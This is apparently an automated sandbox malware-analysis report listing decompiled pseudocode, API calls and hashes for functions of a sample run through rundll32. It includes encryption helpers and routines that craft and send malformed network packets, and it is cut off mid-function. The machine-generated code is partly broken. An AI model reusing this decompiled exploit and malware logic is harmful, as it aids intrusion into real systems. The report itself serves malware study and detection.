Instruction Fuzzy Hash: C401D3B690021CBFEB21AFD5DC84EEFBF7CEB44654F008466FA05A2150E6748E519BA4

Uniqueness

Uniqueness Score: -1.00%

Function 007B56D8 Relevance: 7.6, APIs: 5, Instructions: 72
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E007B56D8(int* __eax, intOrPtr _a4, void* _a8, void** _a12) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _t20;
				intOrPtr _t22;
				void* _t23;
				int* _t25;
				int _t26;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void** _t33;
				void* _t34;

				_t25 = __eax;
				_v12 = 0;
				if(_a12 != 0 && __eax != 0) {
					_t31 = __imp__CryptEncrypt;
					_v8 = 0xf0;
					 *_t31(_a4, 0, 1, 0, 0,  &_v8, 0, _t30, _t34);
					if(0 != 0) {
						_t20 = LocalAlloc(0x40, _v8);
						_v16 = _t20;
						 *_a12 = _t20;
						if(_t20 != 0) {
							memcpy(_t20, _a8, 0xf0);
							 *_t25 = 0xf0;
							_t22 =  *_t31(_a4, 0, 1, 0, _v16, _t25, _v8);
							_v12 = _t22;
							if(_t22 == 0) {
								_t33 = _a12;
								_t26 =  *_t25;
								_t23 =  *_t33;
								_t29 = _t23;
								while(_t26 != 0) {
									 *_t29 = 0;
									_t29 = _t29 + 1;
									_t26 = _t26 - 1;
								}
								LocalFree(_t23);
								 *_t33 = 0;
							}
						}
					}
				}
				return _v12;
			}

0x007b56df
0x007b56e3
0x007b56e9
0x007b56f9
0x007b5711
0x007b5714
0x007b5718
0x007b571f
0x007b5728
0x007b572b
0x007b572f
0x007b5736
0x007b5741
0x007b5750
0x007b5752
0x007b5757
0x007b5759
0x007b575c
0x007b575e
0x007b5760
0x007b5764
0x007b5766
0x007b5769
0x007b576a
0x007b576a
0x007b576e
0x007b5774
0x007b5774
0x007b5757
0x007b572f
0x007b5777
0x007b577d

APIs

CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,?,?,?,?), ref: 007B5714
LocalAlloc.KERNEL32(00000040,?,?,?,?), ref: 007B571F
memcpy.MSVCRT ref: 007B5736
CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 007B5750
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B576E

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CryptEncryptLocal$AllocFreememcpy
String ID:
API String ID: 55365748-0
Opcode ID: 35715f6aa118cb848181ffea6ef303be870e5c857140c56661214a338ec6d7ab
Instruction ID: 0309b902b589a0499f1e9f8d188f72dee7d380239c6133cd3522324ea02c60f6
Opcode Fuzzy Hash: 35715f6aa118cb848181ffea6ef303be870e5c857140c56661214a338ec6d7ab
Instruction Fuzzy Hash: 77215E75A00219FFDB219FA5DC84FEEBFA9EF08750F104165F904E7250E6758A11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007B5780 Relevance: 6.0, APIs: 4, Instructions: 47encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 007B579E
LocalAlloc.KERNEL32(00000040,?,00000000,?,007B5988,00000000,?,?,?,?,?,?,?,?), ref: 007B57AD
CryptBinaryToStringW.CRYPT32(?,00000000,00000001,00000000,?), ref: 007B57C6
LocalFree.KERNEL32(00000000,?,007B5988,00000000,?,?,?,?,?,?,?,?), ref: 007B57D6

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 1c714e15b2ab148b48bb0ea194a9c57dd461093eca4017a09cff67c504f8b38a
Instruction ID: 689ee6a17236c01e69c729ae6b518b0b61be2e3d8cbed12f5bb2cca0ce4e8f26
Opcode Fuzzy Hash: 1c714e15b2ab148b48bb0ea194a9c57dd461093eca4017a09cff67c504f8b38a
Instruction Fuzzy Hash: 6D016DB620020DFFEB118F98CC80FEE7BADEB44754F108025FA0097250EAB5DE009B60

Uniqueness

Uniqueness Score: -1.00%

Function 007B6246 Relevance: 4.5, APIs: 3, Instructions: 39encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6260
CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6273
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,007B62E9,?,?,?,?), ref: 007B6289

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CryptHash$CreateDataParam
String ID:
API String ID: 3669532303-0
Opcode ID: 734abc275626d65bca16777841be52be989f90af509e0f3406c8a90e392db171
Instruction ID: 41e1840782d7c2eb95a537947cf657f525ebba87ea9a871165bfaf30a183b4b2
Opcode Fuzzy Hash: 734abc275626d65bca16777841be52be989f90af509e0f3406c8a90e392db171
Instruction Fuzzy Hash: 05F0DAB6200308BFE7219FA9DD85EAB77BDFB48744B508839F606D6150E775EE048B20

Uniqueness

Uniqueness Score: -1.00%

Function 007B29A2 Relevance: 68.6, APIs: 38, Strings: 1, Instructions: 367
memorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E007B29A2(intOrPtr _a4, void** _a8, short _a12, intOrPtr* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t160;
				signed int _t166;
				void* _t172;
				intOrPtr _t173;
				short _t174;
				short _t175;
				signed int _t179;
				short _t182;
				signed int _t183;
				signed int _t185;
				intOrPtr _t188;
				short _t189;
				void* _t192;
				void* _t195;
				void* _t204;
				short _t207;
				short _t208;
				short _t209;
				void* _t217;
				short _t223;
				short _t224;
				void* _t226;
				void* _t227;
				void* _t235;
				void* _t240;
				signed int _t241;
				signed int _t246;
				signed int _t247;
				signed int _t252;
				signed int _t254;
				intOrPtr _t261;
				signed int _t262;
				void* _t264;
				signed int _t271;
				void** _t273;
				signed int _t277;
				intOrPtr* _t279;
				intOrPtr _t280;
				void** _t281;
				void* _t285;
				void* _t286;
				void* _t289;
				intOrPtr _t293;
				void* _t297;
				void* _t300;
				void* _t302;
				void* _t304;
				intOrPtr* _t305;
				intOrPtr* _t306;
				void* _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				void* _t313;

				_v24 = 0xbadf00d;
				_t160 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v8 = _t160;
				if(_t160 == 0) {
					L30:
					return _v24;
				}
				_t240 = HeapAlloc(GetProcessHeap(), 8, 0x1124);
				if(_t240 == 0) {
					L29:
					HeapFree(GetProcessHeap(), 8, _v8);
					goto L30;
				}
				_t273 = _a8;
				_t166 = rand();
				asm("cdq");
				_t241 = 0x14;
				 *((intOrPtr*)( *_t273 + 0x22)) =  *((intOrPtr*)( *_t273 + 0x22)) + _t166 % _t241;
				_t297 =  *_t273;
				_v28 = ( *(_t297 + 0x22) & 0x0000ff00) - 0x00000100 & 0x0000ffff;
				_t172 = memcpy(_t240, _t297, 0x100 << 2);
				_t308 = _t307 + 0xc;
				__imp__#9(0x50, 9);
				 *(_t240 + 2) = _t172;
				_t173 = 4;
				 *((intOrPtr*)(_t240 + 0x28)) = _t173;
				 *((intOrPtr*)(_t240 + 0x38)) = _t173;
				_t174 = 5;
				 *((short*)(_t240 + 0x49)) = _t174;
				_t175 = 7;
				_t277 = 0;
				 *((short*)(_t240 + 0x4b)) = _t175;
				 *((char*)(_t240 + 8)) = 0xa0;
				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
				 *(_t240 + 0x2c) = 0x10d0;
				 *((intOrPtr*)(_t240 + 0x30)) = 0x3f40;
				 *(_t240 + 0x34) = 0x10d0;
				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
				 *(_t240 + 0x40) = 0;
				 *(_t240 + 0x44) = 0;
				 *((char*)(_t240 + 0x48)) = 0;
				 *((short*)(_t240 + 0x50)) = _a12;
				do {
					 *((char*)(_t240 + _t277 + 0x54)) = rand();
					_t277 = _t277 + 1;
				} while (_t277 < 0x10d0);
				_v12 = _v12 & 0x00000000;
				do {
					_t179 = rand();
					_t246 = 0x14;
					asm("cdq");
					 *((intOrPtr*)( *_a8 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t179 % _t246;
					_t279 = _a8;
					_t182 =  *((intOrPtr*)( *_t279 + 0x22));
					 *((short*)(_t240 + 0x22)) = _t182;
					__imp__#19(_a4, _t240, 0x54, 0);
					if(_t182 <= 0) {
						goto L7;
					}
					__imp__#16(_a4, _v8, 0xffff, 0);
					if(_t182 <= 0) {
						break;
					}
					L7:
					_v12 = _v12 + 1;
				} while (_v12 < 4);
				_t280 =  *_t279;
				_t183 = rand();
				asm("cdq");
				_t247 = 0x14;
				_t185 = _t183 % _t247 +  *(_t280 + 0x22) & 0x0000ffff;
				_v32 = _t185;
				 *(_t280 + 0x22) = _t185;
				__imp__#9(0x1120);
				_t281 = _a8;
				 *(_t240 + 2) = _t185;
				 *((short*)(_t240 + 0x22)) =  *((intOrPtr*)( *_t281 + 0x22));
				_t188 = 4;
				 *((intOrPtr*)(_t240 + 0x28)) = _t188;
				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
				 *(_t240 + 0x2c) = 0x10d0;
				 *((intOrPtr*)(_t240 + 0x38)) = _t188;
				_t189 = 5;
				 *((short*)(_t240 + 0x49)) = _t189;
				 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *_a16 + 0x74)) - 0x10d0;
				 *(_t240 + 0x34) = 0x10d0;
				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
				 *(_t240 + 0x40) = 0x10d0;
				 *(_t240 + 0x44) = 0x50;
				 *((char*)(_t240 + 0x48)) = 0;
				 *((short*)(_t240 + 0x4b)) = 0x10d7;
				_t192 = HeapAlloc(GetProcessHeap(), 8, 0x160);
				_v20 = _t192;
				if(_t192 == 0) {
					L28:
					HeapFree(GetProcessHeap(), 8, _t240);
					goto L29;
				}
				_t252 = 9;
				_t195 = memcpy(_t192,  *_t281, _t252 << 2);
				_t309 = _t308 + 0xc;
				__imp__#9(0x15c);
				_t300 = _v20;
				 *(_t300 + 2) = _t195;
				 *((intOrPtr*)(_t300 + 0x2c)) = 0x114;
				 *((intOrPtr*)(_t300 + 0x3c)) = 0x114;
				 *((char*)(_t300 + 8)) = 0xa1;
				 *((char*)(_t300 + 0x24)) = 0x12;
				 *(_t300 + 0x40) = 0x48;
				 *((short*)(_t300 + 0x49)) = 0x115;
				_t285 = 0;
				do {
					 *((char*)(_t300 + _t285 + 0x4c)) = rand();
					_t285 = _t285 + 1;
				} while (_t285 <  *((intOrPtr*)(_t300 + 0x3c)));
				_t286 = HeapAlloc(GetProcessHeap(), 8, 0x48);
				_v16 = _t286;
				if(_t286 == 0) {
					L27:
					HeapFree(GetProcessHeap(), 8, _t300);
					goto L28;
				}
				_t254 = 9;
				_t204 = memcpy(_t286,  *_a8, _t254 << 2);
				_t310 = _t309 + 0xc;
				__imp__#9(0x44);
				_t302 = _v16;
				 *(_t302 + 2) = _t204;
				 *((short*)(_t302 + 0x22)) = _v28;
				 *((short*)(_t302 + 0x25)) = 0x200;
				 *((char*)(_t302 + 8)) = 0x25;
				 *((char*)(_t302 + 0x24)) = 0xe;
				 *(_t302 + 0x31) =  *(_t302 + 0x31) | 0xffffffff;
				_t207 = 4;
				 *((short*)(_t302 + 0x37)) = _t207;
				_t208 = 0x40;
				 *((short*)(_t302 + 0x39)) = _t208;
				_t209 = 5;
				 *((short*)(_t302 + 0x41)) = _t209;
				 *((short*)(_t302 + 0x27)) =  *((intOrPtr*)( *_a16 + 0x7c)) - 0x200;
				 *((short*)(_t302 + 0x44)) = _a12;
				_t289 = HeapAlloc(GetProcessHeap(), 8, 0x1638);
				_v12 = _t289;
				if(_t289 == 0) {
					L26:
					HeapFree(GetProcessHeap(), 8, _t302);
					_t300 = _v20;
					goto L27;
				}
				memcpy(_t289, _t240, 0x1124);
				_t110 = _t289 + 0x1124; // 0x1124
				_t217 = memcpy(_t110, _v20, 0x160);
				__imp__#9(0x50);
				 *(_t240 + 2) = _t217;
				 *((short*)(_t240 + 0x22)) = _a12;
				_t261 = 4;
				 *((intOrPtr*)(_t240 + 0x28)) = _t261;
				 *((intOrPtr*)(_t240 + 0x24)) = 0x13;
				 *(_t240 + 0x40) =  *(_t240 + 0x40) & 0x00000000;
				_t271 =  *((intOrPtr*)( *_a16 + 0x74)) - 0x1000;
				 *(_t240 + 0x44) =  *(_t240 + 0x44) & 0x00000000;
				 *((intOrPtr*)(_t240 + 0x30)) = 0x1000;
				 *(_t240 + 0x34) = _t271;
				_t223 = 5;
				 *((short*)(_t240 + 0x49)) = _t223;
				_t224 = 7;
				 *((short*)(_t240 + 0x4b)) = _t224;
				_t126 = _t289 + 0x1284; // 0x1284
				 *((intOrPtr*)(_t240 + 0x38)) = _t261;
				_t262 = 0x15;
				 *(_t240 + 0x2c) = _t271;
				 *((intOrPtr*)(_t240 + 0x3c)) = 0x4c;
				 *((char*)(_t240 + 0x48)) = 0;
				_t226 = memcpy(_t126, _t240, _t262 << 2);
				_t313 = _t310 + 0x24;
				_t132 = _t226 + 0x54; // 0x12d8
				_t304 = _t132;
				_t293 = 0xc;
				do {
					_t227 = _v16;
					 *((short*)(_t227 + 0x22)) =  *((short*)(_t227 + 0x22)) + 1;
					memcpy(_t304, _t227, 0x48);
					_t313 = _t313 + 0xc;
					_t304 = _t304 + 0x48;
					_t293 = _t293 - 1;
				} while (_t293 != 0);
				_t305 = __imp__#19;
				_push(_t293);
				_push(0x111c);
				_push(_v12);
				_push(_a4);
				if( *_t305() <= 0) {
					L25:
					HeapFree(GetProcessHeap(), 8, _v12);
					_t302 = _v16;
					goto L26;
				}
				_push(_t293);
				_push(0x51c);
				_push(_v12 + 0x111c);
				_push(_a4);
				if( *_t305() <= 0) {
					goto L25;
				}
				_t306 = __imp__#16;
				_push(_t293);
				_a12 = _t293;
				_push(0xffff);
				_push(_v8);
				while(1) {
					_t235 =  *_t306(_a4);
					if(_t235 <= 0) {
						break;
					}
					_t264 = _v8;
					_a12 = _a12 + _t235;
					if( *((intOrPtr*)(_t264 + 9)) != 0) {
						goto L25;
					}
					if(_a12 >= 0x147b) {
						if(E007B2708(_t264, _t264, _t235, _a16) != 0) {
							_v24 = _v24 & 0x00000000;
							 *((short*)( *_a8 + 0x22)) = _v32;
						}
						goto L25;
					}
					_push(0);
					_push(0xffff);
					_push(_t264);
				}
				goto L25;
			}

0x007b29b8
0x007b29c8
0x007b29ca
0x007b29cf
0x007b2e08
0x007b2e0f
0x007b2e0f
0x007b29e1
0x007b29e5
0x007b2df6
0x007b2e02
0x00000000
0x007b2e02
0x007b29eb
0x007b29f0
0x007b29f6
0x007b29f9
0x007b2a03
0x007b2a07
0x007b2a20
0x007b2a23
0x007b2a23
0x007b2a25
0x007b2a2d
0x007b2a31
0x007b2a32
0x007b2a35
0x007b2a3a
0x007b2a3b
0x007b2a41
0x007b2a47
0x007b2a49
0x007b2a51
0x007b2a55
0x007b2a5c
0x007b2a5f
0x007b2a66
0x007b2a69
0x007b2a70
0x007b2a73
0x007b2a76
0x007b2a7a
0x007b2a7e
0x007b2a84
0x007b2a88
0x007b2a89
0x007b2a8d
0x007b2a91
0x007b2a96
0x007b2a9e
0x007b2a9f
0x007b2aaa
0x007b2aae
0x007b2ab3
0x007b2ab7
0x007b2abb
0x007b2ac3
0x00000000
0x00000000
0x007b2ad2
0x007b2ada
0x00000000
0x00000000
0x007b2adc
0x007b2adc
0x007b2adf
0x007b2ae5
0x007b2ae7
0x007b2aef
0x007b2af0
0x007b2afc
0x007b2aff
0x007b2b02
0x007b2b06
0x007b2b0c
0x007b2b14
0x007b2b20
0x007b2b24
0x007b2b25
0x007b2b2a
0x007b2b31
0x007b2b37
0x007b2b3a
0x007b2b3b
0x007b2b4b
0x007b2b4e
0x007b2b51
0x007b2b58
0x007b2b5b
0x007b2b62
0x007b2b66
0x007b2b71
0x007b2b77
0x007b2b7c
0x007b2de6
0x007b2df0
0x00000000
0x007b2df0
0x007b2b86
0x007b2b8e
0x007b2b8e
0x007b2b90
0x007b2b96
0x007b2b99
0x007b2ba2
0x007b2ba5
0x007b2ba9
0x007b2bad
0x007b2bb1
0x007b2bb8
0x007b2bbc
0x007b2bbe
0x007b2bc4
0x007b2bc8
0x007b2bc9
0x007b2bdf
0x007b2be1
0x007b2be6
0x007b2dd6
0x007b2de0
0x00000000
0x007b2de0
0x007b2bf3
0x007b2bf6
0x007b2bf6
0x007b2bf8
0x007b2bfe
0x007b2c01
0x007b2c09
0x007b2c14
0x007b2c1f
0x007b2c23
0x007b2c2b
0x007b2c32
0x007b2c35
0x007b2c39
0x007b2c3c
0x007b2c40
0x007b2c41
0x007b2c4e
0x007b2c54
0x007b2c65
0x007b2c67
0x007b2c6c
0x007b2dc3
0x007b2dcd
0x007b2dd3
0x00000000
0x007b2dd3
0x007b2c79
0x007b2c89
0x007b2c90
0x007b2c9a
0x007b2ca0
0x007b2ca8
0x007b2cb3
0x007b2cb4
0x007b2cb7
0x007b2cc1
0x007b2cca
0x007b2ccc
0x007b2cd0
0x007b2cd7
0x007b2cda
0x007b2cdd
0x007b2ce1
0x007b2ce4
0x007b2ce8
0x007b2cee
0x007b2cf1
0x007b2cf6
0x007b2cf9
0x007b2d00
0x007b2d04
0x007b2d04
0x007b2d08
0x007b2d08
0x007b2d0b
0x007b2d0c
0x007b2d0c
0x007b2d0f
0x007b2d17
0x007b2d1c
0x007b2d1f
0x007b2d22
0x007b2d22
0x007b2d25
0x007b2d2b
0x007b2d2c
0x007b2d31
0x007b2d34
0x007b2d3b
0x007b2dae
0x007b2dba
0x007b2dc0
0x00000000
0x007b2dc0
0x007b2d40
0x007b2d41
0x007b2d4b
0x007b2d4c
0x007b2d53
0x00000000
0x00000000
0x007b2d55
0x007b2d5b
0x007b2d5c
0x007b2d64
0x007b2d65
0x007b2d83
0x007b2d86
0x007b2d8a
0x00000000
0x00000000
0x007b2d6a
0x007b2d6d
0x007b2d74
0x00000000
0x00000000
0x007b2d7d
0x007b2d9b
0x007b2da6
0x007b2daa
0x007b2daa
0x00000000
0x007b2d9b
0x007b2d7f
0x007b2d81
0x007b2d82
0x007b2d82
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,74654F20,?,007B4775), ref: 007B29BF
HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B29C8
GetProcessHeap.KERNEL32(00000008,00001124,?,007B4775), ref: 007B29DC
HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B29DF
rand.MSVCRT ref: 007B29F0
htons.WS2_32(00000050), ref: 007B2A25
rand.MSVCRT ref: 007B2A7E
rand.MSVCRT ref: 007B2A96
send.WS2_32(00000000,00000000,00000054,00000000), ref: 007B2ABB
recv.WS2_32(00000000,?,0000FFFF,00000000), ref: 007B2AD2
rand.MSVCRT ref: 007B2AE7
htons.WS2_32(00001120), ref: 007B2B06
GetProcessHeap.KERNEL32(00000008,00000160,?,007B4775), ref: 007B2B6A
HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2B71
htons.WS2_32(0000015C), ref: 007B2B90
rand.MSVCRT ref: 007B2BBE
GetProcessHeap.KERNEL32(00000008,00000048,?,007B4775), ref: 007B2BD2
HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2BD9
htons.WS2_32(00000044), ref: 007B2BF8
GetProcessHeap.KERNEL32(00000008,00001638,?,007B4775), ref: 007B2C58
HeapAlloc.KERNEL32(00000000,?,007B4775), ref: 007B2C5F
memcpy.MSVCRT ref: 007B2C79
memcpy.MSVCRT ref: 007B2C90
htons.WS2_32(00000050), ref: 007B2C9A
memcpy.MSVCRT ref: 007B2D17
send.WS2_32(00000004,00000004,0000111C,0000000B), ref: 007B2D37
send.WS2_32(00000004,-00001118,0000051C,0000000B), ref: 007B2D4F
recv.WS2_32(00000004,?,0000FFFF,0000000B), ref: 007B2D86
GetProcessHeap.KERNEL32(00000008,00000004,?,?,?,?,?,?,?,?,?,?,007B4775), ref: 007B2DB3
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,007B4775), ref: 007B2DBA
GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DC6
HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DCD
GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DD9
HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DE0
GetProcessHeap.KERNEL32(00000008,00000000,?,007B4775), ref: 007B2DE9
HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2DF0
GetProcessHeap.KERNEL32(00000008,?,?,007B4775), ref: 007B2DFB
HeapFree.KERNEL32(00000000,?,007B4775), ref: 007B2E02

Strings

Oet Uet0Xet, xrefs: 007B29AB, 007B2B6A, 007B2BD2, 007B2C58, 007B2DB3, 007B2DC6, 007B2DD9, 007B2DE9, 007B2DFB

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$AllocFreehtonsrand$memcpysend$recv
String ID: Oet Uet0Xet
API String ID: 2063504749-3175316637
Opcode ID: 21765e663928116148297beb8eb9c2503cf50dbc249df58b9eb308c5fbeea9e6
Instruction ID: 886a4db3e1d0bd02b5ccfe81fd80c0d3ed5b9483ce5770b2217225217052700d
Opcode Fuzzy Hash: 21765e663928116148297beb8eb9c2503cf50dbc249df58b9eb308c5fbeea9e6
Instruction Fuzzy Hash: 8EE1BE75600345EFEB249FA4CC89FAA7BB4FF48710F108159FA049B292E7B9D841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 007B3D0D Relevance: 47.6, APIs: 26, Strings: 1, Instructions: 326
memorysleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E007B3D0D(void* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr* _a8, short _a12, intOrPtr _a16, void* _a20, void** _a24, long _a28, void* _a32) {
				char _v5;
				void* _v12;
				void* _t139;
				short _t158;
				void* _t169;
				signed int _t173;
				int _t176;
				void* _t184;
				signed short _t186;
				intOrPtr _t207;
				void* _t212;
				short _t219;
				void* _t223;
				intOrPtr* _t225;
				short _t227;
				short _t228;
				signed int _t229;
				intOrPtr* _t234;
				intOrPtr _t243;
				void* _t255;
				void* _t261;

				_t243 = __edx;
				_push(__ecx);
				_push(__ecx);
				 *_a24 =  *_a24 & 0x00000000;
				_v5 = 0;
				_t139 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
				_v12 = _t139;
				if(_t139 == 0) {
					L24:
					return _v5;
				}
				_t261 = HeapAlloc(GetProcessHeap(), 8, 0x27);
				if(_t261 == 0) {
					L23:
					HeapFree(GetProcessHeap(), 8, _v12);
					goto L24;
				}
				 *_t261 = 0x12;
				 *((intOrPtr*)(_t261 + 0x1c)) = 0x48;
				_t223 = HeapAlloc(GetProcessHeap(), 8, 0x3d);
				if(_t223 == 0) {
					L22:
					HeapFree(GetProcessHeap(), 8, _t261);
					goto L23;
				}
				_t225 =  *_a32;
				if(1 !=  *_t225) {
					 *(_t261 + 8) = 0x3c;
					asm("cdq");
					asm("adc edx, [ecx+0x4c]");
					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
					 *((intOrPtr*)(_t223 + 5)) = _t243;
					 *((intOrPtr*)(_t223 + 9)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
					 *((intOrPtr*)(_t223 + 0x11)) = _a16;
					 *((intOrPtr*)(_t223 + 0x15)) = _a20;
					_t158 = _a28;
					asm("adc edx, 0x0");
					 *((intOrPtr*)(_t223 + 0xd)) =  *((intOrPtr*)(_t225 + 0x4c));
					 *((char*)(_t223 + 0x21)) = 8;
					 *((char*)(_t223 + 0x25)) = 8;
					 *((char*)(_t223 + 0x29)) = 8;
					 *((short*)(_t223 + 0x2d)) = _t158;
					 *((short*)(_t223 + 0x31)) = _t158;
					 *((short*)(_t223 + 0x35)) = _t158;
					 *((char*)(_t223 + 0x3b)) = 5;
				} else {
					 *(_t261 + 8) = 0x30;
					asm("cdq");
					asm("adc edx, [ecx+0x4c]");
					 *((intOrPtr*)(_t223 + 1)) = ( *(_t225 + 0x51) & 0x000000ff) +  *((intOrPtr*)(_t225 + 0x48));
					 *((intOrPtr*)(_t223 + 5)) = _t243;
					 *((intOrPtr*)(_t223 + 5)) =  *((intOrPtr*)(_t225 + 0x48)) + 0x200;
					 *((intOrPtr*)(_t223 + 9)) = _a16;
					_t219 = _a28;
					 *((char*)(_t223 + 0x15)) = 8;
					 *((char*)(_t223 + 0x19)) = 8;
					 *((char*)(_t223 + 0x1d)) = 8;
					 *((short*)(_t223 + 0x21)) = _t219;
					 *((short*)(_t223 + 0x25)) = _t219;
					 *((short*)(_t223 + 0x29)) = _t219;
					 *((char*)(_t223 + 0x2f)) = 5;
				}
				 *(_t261 + 0x18) =  *(_t261 + 8);
				 *(_t261 + 0x20) =  *(_t225 + 0x53) & 0x000000ff;
				 *(_t261 + 0x25) = ( *(_t261 + 0x18) & 0x0000ffff) + 1;
				if(E007B3209(_t225, _a4,  *_a8,  *(_t225 + 0x30) & 0x0000ffff, _t261, _t223, ( *(_t261 + 0x18) & 0x0000ffff) + 1) == 0) {
					L21:
					HeapFree(GetProcessHeap(), 8, _t223);
					goto L22;
				} else {
					Sleep(0x7d0);
					_t169 = HeapAlloc(GetProcessHeap(), 8, 0x29);
					_a20 = _t169;
					if(_t169 == 0) {
						goto L21;
					}
					 *((intOrPtr*)(_t169 + 8)) = 0x42e0;
					 *((intOrPtr*)(_t169 + 0x10)) = 0x42e0;
					 *_t169 = 0x13;
					 *(_t169 + 0x14) = 4;
					 *((intOrPtr*)(_t169 + 0x18)) = 0x4c;
					_t227 = 5;
					 *((short*)(_t169 + 0x25)) = _t227;
					 *((intOrPtr*)(_t169 + 4)) = 0x1000;
					 *((intOrPtr*)(_t169 + 0xc)) = 0x1000;
					_t228 = 7;
					 *((short*)(_t169 + 0x27)) = _t228;
					asm("stosd");
					asm("stosw");
					asm("stosb");
					 *((short*)(_t223 + 3)) = _a12;
					_t173 = rand();
					_t229 = 0x28;
					asm("cdq");
					 *( *_a8 + 0x22) =  *( *_a8 + 0x22) + _t173 % _t229;
					_t253 = _a8;
					_t231 =  *( *_a8 + 0x22) & 0x0000ffff;
					_t176 = E007B32AF(_a4,  *_a8,  *( *_a8 + 0x22) & 0x0000ffff, _a20, _t223,  *(_a20 + 0x27) & 0x0000ffff);
					if(_t176 == 0) {
						memset(_t261, _t176, 0x27);
						 *_t261 = 0x12;
						_t184 = E007B3209(_t231, _a4,  *_t253,  *( *_a32 + 0x32) & 0x0000ffff, _t261, _t223,  *(_t261 + 0x25) & 0x0000ffff);
						if(_t184 != 0) {
							_t255 = _v12;
							__imp__#16(_a4, _t255, 0xffff, 0);
							if(_t184 > 0 &&  *((intOrPtr*)(_t255 + 9)) == 0) {
								_a28 = _a28 & 0x0000ffff;
								_t186 =  *(_t255 + 2) & 0x0000ffff;
								__imp__#9(_t186);
